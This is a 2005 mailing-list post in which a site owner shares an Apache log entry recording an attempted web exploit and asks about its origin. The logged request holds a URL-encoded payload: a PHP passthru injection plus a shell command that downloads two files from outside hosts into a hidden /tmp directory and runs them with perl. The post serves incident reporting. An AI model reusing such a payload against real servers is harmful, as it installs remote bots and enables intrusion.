|
Security Incidents
mailing list archives
Attempted exploit for some web service.
From: Robin <robin () kallisti net nz>
Date: Fri, 28 Jan 2005 00:41:57 +1300
Hi, I just got this in my apache logs:
65.39.227.110 - - [28/Jan/2005:00:23:26 +1300]
"GET /RobinsStuff/UnsortedLinks&r
ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.te
mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/
.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%6
5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.
%70%61%73%73%74%68%72%75%28%24%48%5
4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200
11746 "-" "LWP::Simple/5.65"
(sorry about the wrapping). Now, I know it didn't hurt the service it hit, as
it's a Wiki page, and the software ignores any unexpected parameters on the
URL. I'm wondering where it comes from, however. It's also useful to note
that that IP address hadn't touched my webserver at all recently, other than
this. Out of curiosity, I checked, and both the URLs that it tries to wget
stuff from are 404.
--
Robin <robin () kallisti net nz> JabberID: <eythian () jabber org>
Hostes alienigeni me abduxerunt. Qui annus est?
PGP Key 0xA99CEB6D = 5957 6D23 8B16 EFAB FEF8 7175 14D3 6485 A99C EB6D
Attachment:
_bin
Description:
 By Date 
By Thread
Current thread:
- Attempted exploit for some web service. Robin (Jan 27)
|
Intro
